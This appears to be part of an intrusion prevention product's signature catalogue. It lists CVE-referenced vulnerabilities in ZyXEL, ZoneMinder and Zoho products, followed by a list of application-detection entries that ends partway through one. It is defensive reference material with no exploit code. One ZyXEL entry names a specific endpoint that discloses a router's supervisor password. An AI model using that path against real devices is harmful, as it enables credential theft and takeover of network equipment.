Situation: HTTP_CS-Zoho-Manageengine-Servicedesk-Plus-Remote-Code-Execution-CVE-2021-44077
HTTP_CRL-Zoho-Manageengine-Servicedesk-Plus-Remote-Code-Execution-CVE-2021-44077
References:
CVE-2021-44077
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44077
Back to top

Zoho-Manageengine-Servicedesk-Plus-Wsdiscoveryservlet-Stored-XSS

About this vulnerability: A vulnerability in Zoho Corporation ManageEngine Service Desk Plus
Risk: High
First detected in: sgpkg-ips-1369-5242
Last changed: sgpkg-ips-1369-5242
Platform: Generic
Software: ManageEngine ServiceDesk Plus
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported in Zoho ManageEngine ServiceDesk Plus. The vulnerability is due to improper sanitization of user supplied XML submitted to WsDiscoveryServlet endpoint. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the server. Successful exploitation could result in the execution of script code in security context of the target user's browser.
Situation: File-TextId_Zoho-Manageengine-Servicedesk-Plus-Wsdiscoveryservlet-Stored-XSS
References:
CVE-2021-20080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20080
Back to top

Zoho-Manageengine-SupportCenter-Plus-Custom-Schedules-Executor-Command-Injection

About this vulnerability: A vulnerability in Zoho ManageEngine SupportCenter Plus.
Risk: High
First detected in: sgpkg-ips-1566-5242
Last changed: sgpkg-ips-1566-5242
Platform: Generic
Software: Zoho Corporation ManageEngine SupportCenter
Type: Input Validation
Description: A vulnerability in Zoho ManageEngine SupportCenter Plus, versions 11027 and prior, which allows remote attackers to execute arbitrary commands by sending a crafted request to the target server, due to improper validation of schedule settings.
Situation: HTTP_CRL-Zoho-Manageengine-SupportCenter-Plus-Custom-Schedules-Executor-Command-Injection
References:
CVE-2023-23076
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23076
Back to top

ZoneMinder-Language-Settings-Remote-Code-Execution

About this vulnerability: A vulnerability in ZoneMinder.
Risk: High
First detected in: sgpkg-ips-1478-5242
Last changed: sgpkg-ips-1478-5242
Platform: Generic
Software: ZoneMinder
Type: Directory Traversal
Description: A vulnerability in ZoneMinder surveillance software, versions before 1.36.13 and before 1.37.11, which allows remote attackers to execute arbitrary code via a arbitrary file write in the debug log file option chained with a path traversal in language settings.
Situation: HTTP_CS-ZoneMinder-Language-Settings-Remote-Code-Execution
References:
CVE-2022-29806
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29806
Back to top

ZoneMinder-Snapshots-Command-Injection

About this vulnerability: An attempt to exploit a vulnerability in ZoneMinder detected
Risk: High
First detected in: sgpkg-ips-1658-5242
Last changed: sgpkg-ips-1658-5242
Platform: Unix;Linux
Software: ZoneMinder
Type: Input Validation
Description: A vulnerability in ZoneMinder, versions before 1.36.33 and before 1.37.33, which allows remote attackers to execute arbitrary code by appending a command to the "create monitor ids[]"-action of the snapshot view.
Situation: HTTP_CRL-ZoneMinder-Snapshots-Command-Injection
References:
CVE-2023-26035
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26035
Back to top

ZoneMinder-Video-Server-Command-Execution

About this vulnerability: A ZoneMinder Video Server Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ZoneMinder
Type: Code Injection
Description: A vulnerability in ZoneMinder, versions 1.24.0, 1.25.0, and earlier, which allows remote attackers to execute arbitrary commands via shell metacharacters in the runState, key, or command, parameters.
Situation: HTTP_CRL_ZoneMinder-Video-Server-Command-Execution
References:
CVE-2013-0232
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0232
OSVDB-89529
http://www.osvdb.org/89529
Back to top

ZooKeeper-Exhibitor-UI-Command-Injection

About this vulnerability: ZooKeeper Exhibitor UI Command Injection
Risk: Moderate
First detected in: sgpkg-ips-1321-5242
Last changed: sgpkg-ips-1321-5242
Platform: Generic
Software: ZooKeeper Exhibitor
Type: Malfunction
Description: A command injection vulnerability in ZooKeeper Exhibitor
Situation: File-Text_ZooKeeper-Exhibitor-UI-Command-Injection
References:
CVE-2019-0790
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0790
Back to top

Zoom-Linux-Client-Command-Injection-CVE-2017-15049

About this vulnerability: A vulnerability in Zoom Linux client
Risk: High
First detected in: sgpkg-ips-1770-5242
Last changed: sgpkg-ips-1770-5242
Platform: Generic
Software: Zoom
Type: Input Validation
Description: A command injection vulnerability exists in Zoom Linux client versions before 2.0.115900.1201. An unauthenticated attacker can use this vulnerability by enticing a user into clicking a maliciously crafted zoommtg:// scheme handler link.
Situation: File-Text_Zoom-Linux-Client-Command-Injection-CVE-2017-15049
References:
CVE-2017-15049
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15049
Back to top

Zope-XMLTools-Plone-Remote-Command-Execution

About this vulnerability: An attempt to exploit a vulnerability in Zope XMLTools using Plone detected
Risk: High
First detected in: sgpkg-ips-655-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux; Unix
Software: Zope Plone
Type: Input Validation
Description: A remote command execution vulnerability in Zope XMLTools versions 2.12.x and 2.13.x, using Plone versions 4.0.x through 4.0.9, 4.1, and 4.2 through 4.2a2, which allows remote attackers to execute arbitrary commands via vectors related to the p_ class in OFS/misc_.py and the use of Python modules
Situation: HTTP_CS-Zope-XMLTools-Plone-Remote-Command-Execution
References:
CVE-2011-3587
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3587
OSVDB-76105
http://www.osvdb.org/76105
Back to top

ZTE-WebShell-Cmd-Backdoor-CVE-2014-2321

About this vulnerability: A known backdoor in ZTE cable modems
Risk: High
First detected in: sgpkg-ips-1322-5242
Last changed: sgpkg-ips-1322-5242
Platform: Generic
Software: ZTE
Type: Backdoor
Description: There exists a backdoor in ZTE cable modems F460 and F660.
Situation: File-Text_ZTE-WebShell-Cmd-Backdoor-CVE-2014-2321
References:
CVE-2014-2321
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2321
Back to top

ZyXEL-Chained-RCE-Using-LFI-And-Weak-Password-Derivation-Algorithm

About this vulnerability: An attempt to exploit a vulnerability in ZyXEL routers detected
Risk: High
First detected in: sgpkg-ips-1635-5242
Last changed: sgpkg-ips-1635-5242
Platform: Unix;Linux
Software: ZyXEL
Type: Insecure Configuration
Description: A vulnerability in ZyXEL routers which allows remote attackers to to read the entire configuration of the router via the vulnerable endpoint /Export_Log?/data/zcfg_config.json, disclosing the supervisor password.
Situation: HTTP_CSU-ZyXEL-Chained-RCE-Using-LFI-And-Weak-Password-Derivation-Algorithm
References:
CVE-2023-28770
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28770
Back to top

ZyXEL-Command-Injection-CVE-2023-28771

About this vulnerability: A vulnerability in Zyxel firmware
Risk: High
First detected in: sgpkg-ips-1595-5242
Last changed: sgpkg-ips-1595-5242
Platform: Generic
Software: ZyXEL
Type: Malfunction
Description: A command injection vulnerability has been reported in multiple firmware versions of the Zyxel ZyWALL/USG, ATP, and VPN products. An unauthenticated attacker could use this vulnerability to execute arbitrary OS commands as root.
Situation: Generic_UDP-ZyXEL-Command-Injection-CVE-2023-28771
References:
CVE-2023-28771
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28771
Back to top

ZyXEL-NAS-Backdoor-Account-CVE-2024-29972

About this vulnerability: A vulnerability in ZyXEL NAS
Risk: High
First detected in: sgpkg-ips-1734-5242
Last changed: sgpkg-ips-1734-5242
Platform: Generic
Software: ZyXEL
Type: Backdoor
Description: A backdoor account with root privileges has been reported to exist in Zyxel NAS326 and NAS540.
Situation: HTTP_CRL-ZyXEL-NAS-Backdoor-Account-CVE-2024-29972
References:
CVE-2024-29972
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29972
Back to top

ZyXEL-NAS-Command-Injection-CVE-2023-27992

About this vulnerability: A vulnerability in ZyXEL NAS
Risk: High
First detected in: sgpkg-ips-1734-5242
Last changed: sgpkg-ips-1734-5242
Platform: Generic
Software: ZyXEL
Type: Input Validation
Description: A command injection vulnerability has been reported in the WSGI server of the Zyxel NAS326, NAS540, and NAS542. An unauthenticated attacker could use this vulnerability to execute arbitrary OS commands via a crafted HTTP request.
Situation: HTTP_CRL-ZyXEL-NAS-Command-Injection-CVE-2023-27992-CVE-2023-4473
References:
CVE-2023-27992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27992
Back to top

ZyXEL-NAS-Command-Injection-CVE-2024-29973

About this vulnerability: A vulnerability in ZyXEL NAS
Risk: High
First detected in: sgpkg-ips-1734-5242
Last changed: sgpkg-ips-1734-5242
Platform: Generic
Software: ZyXEL
Type: Input Validation
Description: A command injection vulnerability has been reported in Zyxel NAS326 and NAS542. A remote attacker can use this vulnerability to execute arbitrary Python code via a crafted HTTP request.
Situation: HTTP_CRL-ZyXEL-NAS-Command-Injection-CVE-2024-29973
References:
CVE-2024-29973
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29973
Back to top

ZyXEL-NAS-Remote-Code-Execution-CVE-2024-29974

About this vulnerability: A vulnerability in ZyXEL
Risk: High
First detected in: sgpkg-ips-1734-5242
Last changed: sgpkg-ips-1734-5242
Platform: Generic
Software: ZyXEL
Type: Malfunction
Description: A remote code execution vulnerability has been reported in Zyxel NAS326 and NAS542. An attacker can exploit this vulnerability via a maliciously crafted configuration file, allowing for persistent remote code execution on the vulnerable device.
Situation: HTTP_CSU-ZyXEL-NAS-Remote-Code-Execution-CVE-2024-29974
References:
CVE-2024-29974
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29974
Back to top

ZyXEL-Parse_config.py-Command-Injection

About this vulnerability: An attempt to exploit a vulnerability in a ZyXEL device detected
Risk: High
First detected in: sgpkg-ips-1753-5242
Last changed: sgpkg-ips-1753-5242
Platform: Linux; Unix
Software: ZyXEL
Type: Input Validation
Description: A vulnerability in multimple ZyXEL devices, firmware versions 5.21 thru to 5.36, that allows remote attackers to execute arbitrary code on a target device, due to the insufficient input validation in the configuration parser.
Situation: HTTP_CRL-ZyXEL-Parse_config.py-Command-Injection
References:
CVE-2023-33012
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33012
Back to top

ZyXEL-Privilege-Escalation-And-Information-Disclosure-CVE-2024-29976

About this vulnerability: A vulnerability in ZyXEL
Risk: High
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Platform: Generic
Software: ZyXEL
Type: Input Validation
Description: A vulnerability in ZyXEL, NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0, which allows remote attckers to obtain a logged-in administrator's session information containing cookies.
Situation: HTTP_CRL-ZyXEL-Privilege-Escalation-And-Information-Disclosure-CVE-2024-29976
References:
CVE-2024-29976
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29976
Back to top

ZyXEL-Remote-Code-Execution-CVE-2020-9054

About this vulnerability: A vulnerability in Zyxel network device
Risk: High
First detected in: sgpkg-ips-1228-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: There exists a remote code execution vulnerability in Zyxel NAS and firewall products. Successful exploitation could lead in arbitrary code execution on the target device.
Situation: HTTP_CSU-ZyXEL-Remote-Code-Execution-CVE-2020-9054
References:
CVE-2020-9054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9054
Back to top

ZyXEL-Remote-Code-Execution-CVE-2022-30525

About this vulnerability: A vulnerability in multiple Zyxel firewall products
Risk: High
First detected in: sgpkg-ips-1469-5242
Last changed: sgpkg-ips-1469-5242
Platform: Generic
Software: ZyXEL
Type: Input Validation
Description: A pre-auth remote code execution vulnerability has been reported in the administrative web interface of various Zyxel firewall products. Successful exploitation of this vulnerability could lead in arbitrary OS command execution.
Situation: HTTP_CRL-ZyXEL-Remote-Code-Execution-CVE-2022-30525
References:
CVE-2022-30525
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30525
Back to top

ZyXEL-Unauthenticated-Lan-Remote-Code-Execution

About this vulnerability: An attempt to exploit a vulnerability in a Zyxel device detected
Risk: High
First detected in: sgpkg-ips-1717-5242
Last changed: sgpkg-ips-1717-5242
Platform: Linux
Software: ZyXEL
Type: Input Validation
Description: A buffer overflow vulnerability in the zhttpd binary (/bin/zhttpd) used in Zyxel devices, which allows remote attackers to execute arbitrary code on the target system as root.
Situation: HTTP_CSU-ZyXEL-Unauthenticated-Lan-Remote-Code-Execution
References:
CVE-2023-28769
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28769
Back to top

ZyXEL-Undocumented-User-Credentials-CVE-2020-29583

About this vulnerability: A vulnerability in ZyXEL
Risk: High
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1753-5242
Platform: Generic
Software: ZyXEL
Type: Malfunction
Description: Hardcoded credentials with administrator level privileges have been reported to exist in certain firmware versions of the Zyxel firewall and AP controller products. A remote attacker can use these credentials to gain access to a vulnerable device via the web interface or over SSH.
Situation: File-Text_ZyXEL-Undocumented-User-Credentials-CVE-2020-29583
HTTP_CRL-ZyXEL-Undocumented-User-Credentials-CVE-2020-29583
References:
CVE-2020-29583
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29583
Back to top

ZyXEL-VMG4325-B10A-Insecure-Default-Credentials-CVE-2025-0890

About this vulnerability: An attempt to exploit a vulnerability in ZyXEL detected
Risk: High
First detected in: sgpkg-ips-1832-5242
Last changed: sgpkg-ips-1832-5242
Platform: Generic
Software: ZyXEL
Type: Insecure Configuration
Description: Insecure default credentials for the Telnet function in the legacy DSL CPE Zyxel VMG4325-B10A firmware version 1.00(AAFR.4)C0_20170615 could allow an attacker to log in to the management interface if the administrators have the option to change the default credentials but fail to do so.
Situation: Telnet_CTS-ZyXEL-VMG4325-B10A-Insecure-Default-Credentials-CVE-2025-0890
References:
CVE-2025-0890
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0890
Back to top

ZyXEL-VMG4325-B10A-Telnet-Command-Injection-CVE-2024-40891

About this vulnerability: An attempt to exploit a vulnerability in ZyXEL detected
Risk: High
First detected in: sgpkg-ips-1832-5242
Last changed: sgpkg-ips-1832-5242
Platform: Generic
Software: ZyXEL
Type: Input Validation
Description: A post-authentication command injection vulnerability in the management commands of the legacy DSL CPE ZyXEL VMG4325-B10A firmware version 1.00(AAFR.4)C0_20170615 could allow an authenticated attacker to execute operating system (OS) commands on an affected device via Telnet.
Situation: Telnet_CTS-ZyXEL-VMG4325-B10A-Telnet-Command-Injection-CVE-2024-40891
References:
CVE-2024-40891
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-40891
Back to top

ZyXEL-ZyWALL-USG-Appliance-Authentication-Bypass

About this vulnerability: A vulnerability in ZyXEL ZyWALL USG Appliance
Risk: High
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ZyXEL ZyWALL USG Appliance
Type: Malfunction
Description: There is an authentication bypass vulnerability in ZyXEL ZyWALL USG Appliance which allows remote attackers to download the configuration files from the device.
Situation: HTTP_CSU-ZyXEL-ZyWALL-USG-Appliance-Authentication-Bypass
Back to top

Situations


000FreeProxy

About this situation: 000FreeProxy usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1128-5242
Description: 000FreeProxy is a free SSL proxy that can be used to surf the Internet anonymously and to circumvent access limitations.
Back to top

10000ft

About this situation: Application 10000ft detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 10,000ft is planning tool to manage staffing and projects collaboratively.
Back to top

100Bao

About this situation: 100Bao P2P traffic
Context: Application Context
Severity: 1
Tags: Protocols, File Sharing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1678-5242
Description: 100Bao is a Chinese peer-to-peer application.
Back to top

101-Voice

About this situation: Application 101-Voice detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 101 VOICE provides cloud telephony solutions for businesses.
Back to top

101domain

About this situation: Application 101domain detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 101domain is worldwide provider of international domain name registration.
Back to top

101domains

About this situation: Application 101domains detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: International Domain Registration and Domain Portfolio Management, Registration, Renewal, Back Ordering and Hosting
Back to top

1099-Software

About this situation: Application 1099-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: 1099 Pro is a provider of information reporting solutions and services for ACA 1095 1098, 1099, 3921, 3922, 5498, W-2, W-2G, 1042-S, FATCA 8966, Puerto Rico, OECD Common Reporting Standard
Back to top

123-reg

About this situation: Application 123-reg detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 123-reg is a provider of internet related services including connectivity, co-location, dedicated and shared server, website hosting and domain name services.
Back to top

123contactform

About this situation: 123ContactForm usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: 123ContactForm is an easy way to create and use free html forms for your website using their online contact form generator.
Back to top

123Together

About this situation: Application 123Together detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 123Together.com offers Microsoft Exchange hosting, Dedicated and Shared Exchange Server 2010, hosted email, SharePoint Hosting
Back to top

126-Mail

About this situation: 126 Mail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Chinese Web-based Email service that allows users to send and receive emails through web browser.
Back to top

13D-Research

About this situation: Application 13D-Research detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 13D Research provides asset allocation and investment research services. It offers a weekly newsletter and reports on various areas.
Back to top

15five

About this situation: Application 15five detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 15Five Employee Feedback System. Allows your company to surface problems, celebrate wins, discover great ideas and stay tuned in to morale.
Back to top

1984.is

About this situation: Application 1984.is detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 1984.is offering web hosting and VPS services, respecting and protecting the civil and political rights of our customers.
Back to top

1and1

About this situation: Application 1and1 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 1and1 - flexible hosting for your website.
Back to top

1CRM

About this situation: Application 1CRM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 1CRM enables businesses to create and maintain great customer relationships and experiences with the most complete, customizable and affordable customer relationship management (CRM) solution on the market.
Back to top

1fichier

About this situation: 1fichier usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a data storage service, it has onlie data-storage service as well as through FTP server.
Back to top

1internet.tv

About this situation: 1internet.tv usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-630-5211
Description: 1internet.tv is a online streaming video service.
Back to top

1Password

About this situation: Application 1Password detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: A password manager, digital vault, random password generator, form filler and secure digital wallet. 1Password remembers all your passwords for you, and keeps you safe behind the one password that only you know.
Back to top

1st-Domains

About this situation: Application 1st-Domains detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 1st Domains - Domain hosting, registration of domains and DNS Management.
Back to top

1time

About this situation: Application 1time detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 1time is a web-based time and expense tracking application that allows keep track of the real cost of a project for cost analysis on fix cost or billing after.
Back to top

1und1-Mail

About this situation: 1und1 Mail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-636-5211
Description: This site offers a web-mail service for businesses, provided by 1&1 Internet.
Back to top

23andMe

About this situation: Application 23andMe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 23andMe is a human genome research company enabling users to study their ancestry, genealogy, and inherited traits.
Back to top

247-inc

About this situation: Application 247-inc detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 247 inc. delivers customer engagement for service and sales. 247 inc. platform and applications use big data and predictive analytics to understand customers and drive better service and sales results for large enterprises.
Back to top

24online

About this situation: Application 24online detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 24online is a billing and bandwidth management solution that enables WiMax and Wi-Fi providers, Broadband and dial up service providers, hotels, hotspots and cafes to provide time and usage based internet access and to manage subscribers and franchisees.
Back to top

24Seven-Cart

About this situation: Application 24Seven-Cart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 24Seven is a shopping cart platform that allows brick-n-mortar merchants to run an integrated eCommerce website.
Back to top

24sevenoffice

About this situation: 24SevenOffice usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This service offers an ERP system with CRM, financial, project management, and communication modules. Source: Wikipedia
Back to top

24x7-Sserver-Management

About this situation: Application 24x7-Sserver-Management detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 24x7 Server Management - server security, server hardening and server optimization services for Linux Cpanel, Plesk and DirectAdmin shared and reseller hosting servers.
Back to top

2channel

About this situation: 2channel usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1678-5242
Description: 2channel, or 2ch, is an Internet forum for Japanese-speaking population.
Back to top

2Checkout

About this situation: Application 2Checkout detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 2Checkout.com is an online payment processing service that helps accept credit cards, PayPal and debit cards.
Back to top

2dplay

About this situation: 2DPlay usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

2imagine-web2print

About this situation: Application 2imagine-web2print detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 2imagine provides a web2print solution - in SaaS mode: edit Adobe InDesign documents in a WYSIWYG interface.
Back to top

33across

About this situation: 33across usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-629-5211
Description: 33across is a web advertising and statistic collection service.
Back to top

36-Dollar-360

About this situation: Application 36-Dollar-360 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 36 Dollar 360 is an assessment system available for companies.
Back to top

360-Degree-Feedback-Tool

About this situation: Application 360-Degree-Feedback-Tool detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GrapevineEvaluations.com is an online 360 degree feedback software tool that makes it easy to perform a 360 degree evaluation, employee performance evaluation, employee assessment and employee performance review all using our online multi rater employee evaluation software survey system.
Back to top

360-Degree-IT

About this situation: Application 360-Degree-IT detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 360 degree feedback software enables organizations to maximize the strengths of their employees and highlight areas for improvement.
Back to top

360-Enterprise-Suite

About this situation: Application 360-Enterprise-Suite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 360EnterpriseSuite is a cloud CRM, ERP, eCommerce, and HelpDesk software solution.
Back to top

360-Safeguard

About this situation: 360 Safeguard usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-535-5211
Last changed: sgpkg-ips-771-5211
Description: 360 Safeguard is a Chinese security software which can be used to stop computer viruses, malware and trojan horses, or to do security patching for Windows.
Back to top

360-Yunpan

About this situation: 360 Yunpan usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-771-5211
Description: 360 Yunpan is an online cloud storage and file sharing service which was launched by Qihoo 360 Technology. The service can be accessed at the website http://yunpan.360.cn/, or through a client application for Windows or Mac PC, Android, iPhone and iPad.
Back to top

360Alumni

About this situation: Application 360Alumni detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 360Alumni is an alumni directory and engagement platform for higher education.
Back to top

360cloudsolutions

About this situation: Application 360cloudsolutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 360 Cloud Solutions is a provider business consulting firm and NetSuite solution. 360 Cloud Solutions are the people-to-systems integrators.
Back to top

360Contest

About this situation: Application 360Contest detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 360Contest is modular contest software that can be applied to run design, video, audio or test contests.
Back to top

3CLogic

About this situation: Application 3CLogic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CLogic offers a full suite of cloud based inbound and outbound customer interaction channels such as voice, chat and social media which integrate with our clients' existing CRM software.
Back to top

3D-Systems

About this situation: Application 3D-Systems detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 3D Systems specializes on consumer and industrial 3D printing and manufacturing solutions including 3D printers, materials and cloud, on-demand parts services, and 3D scan, design, modeling and inspection software
Back to top

3dcart

About this situation: Application 3dcart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 3dcart is an eCommerce shopping cart online store software and website builder.
Back to top

3DEXCITE

About this situation: Application 3DEXCITE detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 3DEXCITE provide a software, solutions and CGI for professional high-end 3D visualization in real time - from design and development to marketing and sales.
Back to top

3i-infotech

About this situation: Application 3i-infotech detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 3i Infotech is a Information Technology company committed to Empowering Business Transformation. A comprehensive set of IP based software solutions, coupled with a wide range of IT services, uniquely positions the company to address the dynamic requirements of a variety of industry verticals, predominantly Banking, Insurance, Capital Markets, Asset and Wealth Management
Back to top

3jam

About this situation: Application 3jam detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
